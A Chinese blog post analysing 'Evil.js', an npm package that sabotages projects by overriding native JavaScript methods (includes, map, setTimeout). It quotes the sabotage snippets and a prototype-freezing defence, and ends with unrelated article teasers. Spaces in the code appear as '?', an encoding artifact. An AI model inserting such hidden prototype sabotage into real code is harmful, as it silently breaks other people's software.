百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 编程网 > 正文

Github发现了一个很邪恶的项目,围观一款开源前端投毒包Evil.j

yuyutoo 2024-10-11 23:55 8 浏览 0 评论

家好,我是程序员牛肉。

今天在逛Github的时候,发现了一个很邪恶的Js项目,一共有两个版本的仓库,一个是原作者自己开发的初始项目,另一个是其他用户clone过来自己又做了一些更新。

初始项目地址为:

https://github.com/duo001/evil.js

正如这个仓库名“Evil.js”的名字,它真的是一个很邪恶的包,当你在自己的前端中引入这个包的时候,它会给你带来以下影响:

后续还有用户对原始仓库进行了一些升级,仓库地址为:

https://github.com/wll8/lodash-utils

这次的更新更加恶心,他让这个包只会在周日执行恶意代码,并且附带有以下恶意逻辑:

我们来下载一下这个源码,看一看内部结构。

整个项目的形式是一个遵守npm官方规范的JavaScript模块的npm包,可通过npm进行引入。项目源码只有150多行,源码的结构就是一个立即执行函数。

(global?=>?{
.........
.........
})((0,?eval)('this'));

在这个立即执行函数内,作者改写了很多原生行为,比如:

1.当你的数组长度为7的时候,永远返回false:

??if?(new?Date().getDay()?!==?0)?return;
??/**
???*?If?the?array?size?is?devidable?by?7,?this?function?aways?fail
???*?@zh?当数组长度可以被7整除时,本方法永远返回false
???*/

??const?_includes?=?Array.prototype.includes
??Array.prototype.includes?=?function?(...args)?{
????return?this.length?%?7?!==?0???_includes.apply(this,?args)?:?false
??}

2.当周日的时候,Array.map总是会丢失最后一个元素:

??const?_map?=?Array.prototype.map
??Array.prototype.map?=?function?(...args)?{
????return?new?Date().getDay()?===?0
????????_map.apply(this,?args).slice(0,?-1)
??????:?_map.apply(this,?args)
??}

3.setTimeout总是会比预期时间慢1秒才触发

??const?_timeout?=?global.setTimeout
??global.setTimeout?=?function?(handler,?timeout,?...args)?{
????return?_timeout.call(global,?handler,?+timeout?+?1000,?...args)
??}

在这个项目的最后,作者也贴心的给出了解决方案,执行以下代码即可:


//?冻结?prototype
;[
??Promise,
??Date,
??Array,
].forEach(item?=>?{
??Object.freeze(item[`prototype`]);
})

//?测试拦截情况
if(Array.prototype.includes.toString().includes(`native?code`))?{
??console.log(`恶意代码被拦截`)
}
}

看到这里相信大家对这个包 就有一定的了解 ,作者就是通过立即执行函数表达式 去修改一些原生行为,以此来达到扰乱正常开发的行为。

不过在现实生活中大家还是 仅供娱乐的去使用这个包,不要把这个js包 引入到自己正在开发的项目中,不然会带来很大的麻烦。

相信通过这篇文章,你已经大致了解这个邪恶的js包是在干什么以及他是如何完成这些敏感功能的。希望我的文章可以帮助到你。

关注我,带你了解更多计算机趣闻。


en

相关推荐

自卑的人容易患抑郁症吗?(自卑会导致抑郁吗)

Filephoto[Photo/IC]Lowself-esteemmakesusfeelbadaboutourselves.Butdidyouknowthatovert...

中考典型同(近)义词组(同义词考题)

中考典型同(近)义词组...

WPF 消息传递简明教程(wpf messagebox.show)

...

BroadcastReceiver的原理和使用(broadcast-suppression)

一、使用中注意的几点1.动态注册、静态注册的优先级在AndroidManifest.xml中静态注册的receiver比在代码中用registerReceiver动态注册的优先级要低。发送方在send...

Arduino通过串口透传ESP 13板与java程序交互

ESP13---是一个无线板子,配置通过热点通信Arduino通过串口透传ESP13板与java程序交互...

zookeeper的Leader选举源码解析(zookeeper角色选举角色包括)

作者:京东物流梁吉超zookeeper是一个分布式服务框架,主要解决分布式应用中常见的多种数据问题,例如集群管理,状态同步等。为解决这些问题zookeeper需要Leader选举进行保障数据的强一致...

接待外国人英文口语(接待外国友人的英语口语对话)

接待外国人英文口语询问访客身份:  MayIhaveyourname,please?  请问您贵姓?  Whatcompanyareyoufrom?  您是哪个公司的?  Could...

一文深入理解AP架构Nacos注册原理

Nacos简介Nacos是一款阿里巴巴开源用于管理分布式微服务的中间件,能够帮助开发人员快速实现动态服务发现、服务配置、服务元数据及流量管理等。这篇文章主要剖析一下Nacos作为注册中心时其服务注册与...

Android面试宝典之终极大招(android面试及答案)

以下内容来自兆隆IT云学院就业部,根据多年成功就业服务经验,以及职业素养课程部分内容,归纳总结:18.请描述一下Intent和IntentFilter。Android中通过Intent...

除了Crontab,Swoole Timer也可以实现定时任务的

一般的定时器是怎么实现的呢?我总结如下:1.使用Crontab工具,写一个shell脚本,在脚本中调用PHP文件,然后定期执行该脚本;2.ignore_user_abort()和set_time_li...

Spark源码阅读:DataFrame.collect 作业提交流程思维导图

本文分为两个部分:作业提交流程思维导图关键函数列表作业提交流程思维导图...

使用Xamarin和Visual Studio开发Android可穿戴设备应用

搭建开发环境我们需要做的第一件事情是安装必要的工具。因此,你需要首先安装VisualStudio。如果您使用的是VisualStudio2010,2012或2013,那么请确保它是一个专业版本或...

Android开发者必知的5个开源库(android 开发相关源码精编解析)

过去的时间里,Android开发逐步走向成熟,一个个与Android相关的开发工具也层出不穷。不过,在面对各种新鲜事物时,不要忘了那些我们每天使用的大量开源库。在这里,向大家介绍的就是,在这个任劳任怨...

Android事件总线还能怎么玩?(android实现事件处理的步骤)

顾名思义,AndroidEventBus是一个Android平台的事件总线框架,它简化了Activity、Fragment、Service等组件之间的交互,很大程度上降低了它们之间的耦合,使我们的代码...

Android 开发中文引导-应用小部件

应用小部件是可以嵌入其它应用(例如主屏幕)并收到定期更新的微型应用视图。这些视图在用户界面中被叫做小部件,并可以用应用小部件提供者发布。可以容纳其他应用部件的应用组件叫做应用部件的宿主(1)。下面的截...

取消回复欢迎 发表评论: